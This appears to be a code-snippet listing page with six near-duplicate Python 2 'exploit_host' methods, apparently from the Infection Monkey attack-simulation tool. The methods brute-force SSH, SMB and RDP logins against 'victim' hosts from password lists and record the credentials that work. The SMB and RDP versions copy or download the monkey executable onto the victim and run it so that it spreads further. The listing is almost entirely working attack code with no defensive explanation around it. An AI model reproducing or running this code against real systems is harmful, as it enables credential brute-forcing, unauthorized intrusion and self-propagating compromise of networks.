Exemple #1
0
    def exploit_host(self, host, depth=-1, src_path=None):
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.WarningPolicy())

        port = SSH_PORT
        # if ssh banner found on different port, use that port.
        for servkey, servdata in host.services.items():
            if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'):
                port = int(servkey.replace('tcp-', ''))

        is_open, _ = check_port_tcp(host.ip_addr, port)
        if not is_open:
            LOG.info("SSH port is closed on %r, skipping", host)
            return False

        passwords = list(self._config.ssh_passwords[:])
        users = list(self._config.ssh_users)
        known_passwords = [host.get_credentials(x) for x in users]
        if len(known_passwords) > 0:
            for known_pass in known_passwords:
                if known_pass in passwords:
                    passwords.remove(known_pass)
                    passwords.insert(0, known_pass)  #try first
        user_pass = product(users, passwords)

        exploited = False
        for user, curpass in user_pass:
            try:
                ssh.connect(host.ip_addr,
                            username=user,
                            password=curpass,
                            port=port,
                            timeout=None)

                LOG.debug("Successfully logged in %r using SSH (%s : %s)",
                          host, user, curpass)
                host.learn_credentials(user, curpass)
                exploited = True
                break

            except Exception, exc:
                LOG.debug(
                    "Error logging into victim %r with user"
                    " %s and password '%s': (%s)", host, user, curpass, exc)
                report_failed_login(self, host, user, curpass)
                continue
Exemple #2
0
    def exploit_host(self, host, depth=-1, src_path=None):
        assert isinstance(host, VictimHost)

        src_path = src_path or get_target_monkey(host)

        if not src_path:
            LOG.info("Can't find suitable monkey executable for host %r", host)
            return False

        passwords = list(self._config.psexec_passwords[:])
        known_password = host.get_credentials(self._config.psexec_user)
        if known_password is not None:
            if known_password in passwords:
                passwords.remove(known_password)
            passwords.insert(0, known_password)

        exploited = False
        for password in passwords:
            try:
                # copy the file remotely using SMB
                remote_full_path = SmbTools.copy_file(
                    host, self._config.psexec_user, password, src_path,
                    self._config.dropper_target_path,
                    self._config.smb_download_timeout)

                if remote_full_path is not None:
                    LOG.debug("Successfully logged in %r using SMB (%s : %s)",
                              host, self._config.psexec_user, password)
                    host.learn_credentials(self._config.psexec_user, password)
                    exploited = True
                    break
                else:
                    # failed exploiting with this user/pass
                    report_failed_login(self, host, self._config.psexec_user,
                                        password)

            except Exception, exc:
                LOG.debug(
                    "Exception when trying to copy file using SMB to %r with user"
                    " %s and password '%s': (%s)", host,
                    self._config.psexec_user, password, exc)
                continue
Exemple #3
0
    def exploit_host(self, host, depth=-1, src_path=None):
        assert isinstance(host, VictimHost)

        src_path = src_path or get_target_monkey(host)

        if not src_path:
            LOG.info("Can't find suitable monkey executable for host %r", host)
            return False

        passwords = list(self._config.psexec_passwords[:])
        known_password = host.get_credentials(self._config.psexec_user)
        if known_password is not None:
            if known_password in passwords:
                passwords.remove(known_password)
            passwords.insert(0, known_password)

        exploited = False
        for password in passwords:
            try:
                # copy the file remotely using SMB
                remote_full_path = SmbTools.copy_file(host,
                                                      self._config.psexec_user,
                                                      password,
                                                      src_path,
                                                      self._config.dropper_target_path,
                                                      self._config.smb_download_timeout)

                if remote_full_path is not None:
                    LOG.debug("Successfully logged in %r using SMB (%s : %s)",
                              host, self._config.psexec_user, password)
                    host.learn_credentials(self._config.psexec_user, password)
                    exploited = True
                    break
                else:
                    # failed exploiting with this user/pass
                    report_failed_login(self, host, self._config.psexec_user, password)

            except Exception, exc:
                LOG.debug("Exception when trying to copy file using SMB to %r with user"
                          " %s and password '%s': (%s)", host,
                          self._config.psexec_user, password, exc)
                continue
Exemple #4
0
    def exploit_host(self, host, depth=-1, src_path=None):
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.WarningPolicy())

        port = SSH_PORT
        # if ssh banner found on different port, use that port.
        for servkey, servdata in host.services.items():
            if servdata.get("name") == "ssh" and servkey.startswith("tcp-"):
                port = int(servkey.replace("tcp-", ""))

        is_open, _ = check_port_tcp(host.ip_addr, port)
        if not is_open:
            LOG.info("SSH port is closed on %r, skipping", host)
            return False

        passwords = list(self._config.ssh_passwords[:])
        users = list(self._config.ssh_users)
        known_passwords = [host.get_credentials(x) for x in users]
        if len(known_passwords) > 0:
            for known_pass in known_passwords:
                if known_pass in passwords:
                    passwords.remove(known_pass)
                    passwords.insert(0, known_pass)  # try first
        user_pass = product(users, passwords)

        exploited = False
        for user, curpass in user_pass:
            try:
                ssh.connect(host.ip_addr, username=user, password=curpass, port=port, timeout=None)

                LOG.debug("Successfully logged in %r using SSH (%s : %s)", host, user, curpass)
                host.learn_credentials(user, curpass)
                exploited = True
                break

            except Exception, exc:
                LOG.debug(
                    "Error logging into victim %r with user" " %s and password '%s': (%s)", host, user, curpass, exc
                )
                report_failed_login(self, host, user, curpass)
                continue
Exemple #5
0
    def exploit_host(self, host, depth=-1, src_path=None):
        global g_reactor
        assert isinstance(host, VictimHost)

        is_open, _ = check_port_tcp(host.ip_addr, RDP_PORT)
        if not is_open:
            LOG.info("RDP port is closed on %r, skipping", host)
            return False

        src_path = src_path or get_target_monkey(host)

        if not src_path:
            LOG.info("Can't find suitable monkey executable for host %r", host)
            return False

        # create server for http download.
        http_path, http_thread = HTTPTools.create_transfer(host, src_path)

        if not http_path:
            LOG.debug(
                "Exploiter RdpGrinder failed, http transfer creation failed.")
            return False

        cmdline = build_monkey_commandline(host, depth - 1)

        if self._config.rdp_use_vbs_download:
            command = RDP_CMDLINE_HTTP_VBS % {
                'monkey_path': self._config.dropper_target_path,
                'http_path': http_path,
                'parameters': cmdline
            }
        else:
            command = RDP_CMDLINE_HTTP_BITS % {
                'monkey_path': self._config.dropper_target_path,
                'http_path': http_path,
                'parameters': cmdline
            }

        passwords = list(self._config.psexec_passwords[:])
        known_password = host.get_credentials(self._config.psexec_user)
        if known_password is not None:
            if known_password in passwords:
                passwords.remove(known_password)
            passwords.insert(0, known_password)

        if not g_reactor.is_alive():
            g_reactor.daemon = True
            g_reactor.start()

        exploited = False
        for password in passwords:
            try:
                # run command using rdp.
                LOG.info(
                    "Trying rdp logging into victim %r with user %s and password '%s'",
                    host, self._config.psexec_user, password)

                client_factory = CMDClientFactory(self._config.psexec_user,
                                                  password, "", command)

                reactor.callFromThread(reactor.connectTCP, host.ip_addr,
                                       RDP_PORT, client_factory)

                client_factory.done_event.wait()

                if client_factory.success:
                    exploited = True
                    host.learn_credentials(self._config.psexec_user, password)
                    break
                else:
                    # failed exploiting with this user/pass
                    report_failed_login(self, host, self._config.psexec_user,
                                        password)

            except Exception, exc:
                LOG.debug(
                    "Error logging into victim %r with user"
                    " %s and password '%s': (%s)", host,
                    self._config.psexec_user, password, exc)
                continue
Exemple #6
0
    def exploit_host(self, host, depth=-1, src_path=None):
        global g_reactor
        assert isinstance(host, VictimHost)

        is_open, _ = check_port_tcp(host.ip_addr, RDP_PORT)
        if not is_open:
            LOG.info("RDP port is closed on %r, skipping", host)
            return False

        src_path = src_path or get_target_monkey(host)

        if not src_path:
            LOG.info("Can't find suitable monkey executable for host %r", host)
            return False

        # create server for http download.
        http_path, http_thread = HTTPTools.create_transfer(host, src_path)

        if not http_path:
            LOG.debug("Exploiter RdpGrinder failed, http transfer creation failed.")
            return False

        LOG.info("Started http server on %s", http_path)

        cmdline = build_monkey_commandline(host, depth-1)

        if self._config.rdp_use_vbs_download:
            command = RDP_CMDLINE_HTTP_VBS % {
                'monkey_path': self._config.dropper_target_path,
                'http_path': http_path, 'parameters': cmdline}
        else:
            command = RDP_CMDLINE_HTTP_BITS % {
                'monkey_path': self._config.dropper_target_path,
                'http_path': http_path, 'parameters': cmdline}

        passwords = list(self._config.psexec_passwords[:])
        known_password = host.get_credentials(self._config.psexec_user)
        if known_password is not None:
            if known_password in passwords:
                passwords.remove(known_password)
            passwords.insert(0, known_password)

        if not g_reactor.is_alive():
            g_reactor.daemon = True
            g_reactor.start()

        exploited = False
        for password in passwords:
            try:
                # run command using rdp.
                LOG.info("Trying RDP logging into victim %r with user %s and password '%s'",
                         host, self._config.psexec_user, password)

                LOG.info("RDP connected to %r", host)

                client_factory = CMDClientFactory(self._config.psexec_user, password, "", command)

                reactor.callFromThread(reactor.connectTCP, host.ip_addr, RDP_PORT, client_factory)

                client_factory.done_event.wait()

                if client_factory.success:
                    exploited = True
                    host.learn_credentials(self._config.psexec_user, password)
                    break
                else:
                    # failed exploiting with this user/pass
                    report_failed_login(self, host, self._config.psexec_user, password)

            except Exception, exc:
                LOG.debug("Error logging into victim %r with user"
                          " %s and password '%s': (%s)", host,
                          self._config.psexec_user, password, exc)
                continue